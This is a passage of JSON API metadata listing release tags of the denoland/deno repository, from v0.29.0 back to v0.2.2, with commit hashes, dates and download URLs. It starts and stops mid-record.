manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"